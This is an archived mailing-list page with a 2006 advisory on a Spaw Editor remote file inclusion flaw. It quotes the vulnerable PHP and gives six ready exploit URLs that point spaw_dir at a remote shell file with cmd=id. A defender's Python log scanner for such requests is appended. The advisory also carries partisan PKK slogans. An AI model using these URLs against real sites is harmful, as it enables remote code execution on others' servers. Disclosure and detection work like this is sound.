Information Security


Additional information

  Daily summary of bugs in Web applications (PHP, ASP, JSP, CGI, Perl)

  [SA21543] mail f/w system Mail Header Injection Vulnerability

  [SA21604] Drupal E-commerce Module Script Insertion Vulnerabilities

  [SA21603] Drupal Easylinks Module Script Insertion and SQL Injection

  [SA21584] Empire CMS "check_path" File Inclusion Vulnerability

From: botan_(at)_linuxmail.org <botan_(at)_linuxmail.org>
Date: August 21, 2006
Subject: [Kurdish Security # 23] Spaw Editor Remote Include Vulnerability

* Kurdish Security Advisory
* Spaw Editor Remote Include Vulnerability
* Our Party is PKK, Our Army HPG, We will Earn
* contact ? : irc.gigachat.net #kurdhack & [email protected]
* Risk : High
* Class : Remote
* Script : Spaw Editor
* Version : v1.6 and v1.7
* Site :  www.solmetra.com

<?
// include wysiwyg config
include '../config/spaw_control.config.php';
include $spaw_root.'class/lang.class.php';

$theme = empty($HTTP_GET_VARS['theme'])?$spaw_default_theme:
$HTTP_GET_VARS['theme'];
$theme_path = $spaw_dir.'lib/themes/'.$theme.'/';

$l = new SPAW_Lang($HTTP_GET_VARS['lang']);
$l->setBlock('colorpicker');
?>

http://site.com/[path]/dialogs/a.php?spaw_dir=http://www.shell.txt?&cmd=id
http://site.com/[path]/dialogs/collorpicker.phpspaw_dir=http://www.shell.txt&cmd=id
http://site.com/[path]/dialogs/img.php?spaw_dir=http://www.shell.txt?&cmd=id
http://site.com/[path]/dialogs/img_library.php?spaw_dir=http://www.shell.txt?&cmd=id
http://site.com/[path]/dialogs/table.php?spaw_dir=http://www.shell.txt?&cmd=id
http://site.com/[path]/dialogs/td.php?spaw_dir=http://www.shell.txt?&cmd=id

Special MSG! : The Turk state is the aggressor behavior. Don't stay quiet. Hear the Kurdish people is scream be late.. Stop the Turkey Military!
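
Added example (not part of the advisory and not Solmetra's code): a log check a defender can run to find requests shaped like the ones listed above, where a `dialogs/*.php` script receives a remote URL in `spaw_dir`. The log lines, the host `example.test` and the choice to also watch `spaw_root` (the other variable used in an `include` in the quoted code) are assumptions made for the illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request line inside a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# The advisory's URLs all target scripts under dialogs/.
DIALOG_RE = re.compile(r"/dialogs/[^/]+\.php$", re.I)
# Value that points at a remote resource, as in spaw_dir=http://...
REMOTE_RE = re.compile(r"^\s*(?:https?|ftps?)://", re.I)
# spaw_dir is named in the advisory; spaw_root is an assumption (see lead-in).
WATCHED = {"spaw_dir", "spaw_root"}

SAMPLE_LOG = [  # constructed lines, combined log format
    '192.0.2.10 - - [21/Aug/2006:10:00:01 +0000] "GET /spaw/dialogs/colorpicker.php?theme=default&lang=en HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [21/Aug/2006:10:00:05 +0000] "GET /spaw/dialogs/td.php?spaw_dir=http://example.test/x.txt?&cmd=id HTTP/1.1" 200 312 "-" "-"',
    '198.51.100.7 - - [21/Aug/2006:10:00:09 +0000] "GET /spaw/dialogs/img.php?spaw_dir=http%253A%252F%252Fexample.test%252Fx.txt HTTP/1.1" 200 298 "-" "-"',
    '192.0.2.10 - - [21/Aug/2006:10:00:12 +0000] "GET /spaw/dialogs/img.php?spaw_dir=/var/www/spaw/ HTTP/1.1" 200 4000 "-" "-"',
]

def decode_fully(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding (catches double encoding)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def flag_request(line):
    """Return (path, param, value) when a watched parameter holds a remote URL, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    if not DIALOG_RE.search(decode_fully(target.path)):
        return None
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        value = decode_fully(value)
        if name in WATCHED and REMOTE_RE.match(value):
            return target.path, name, value
    return None

def scan(lines):
    """Collect every flagged request from an iterable of log lines."""
    return [hit for hit in map(flag_request, lines) if hit]

if __name__ == "__main__":
    for path, name, value in scan(SAMPLE_LOG):
        print(f"remote include attempt: {path} {name}={value}")
```

A hit is a reason to check which Spaw Editor version is installed; the advisory lists v1.6 and v1.7 as affected.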

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod